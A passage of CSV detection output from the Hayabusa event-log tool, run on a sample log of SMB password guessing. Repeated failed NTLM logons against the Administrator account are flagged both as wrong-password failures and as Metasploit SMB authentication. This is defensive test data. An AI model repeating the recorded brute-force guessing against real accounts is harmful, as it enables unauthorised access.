Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 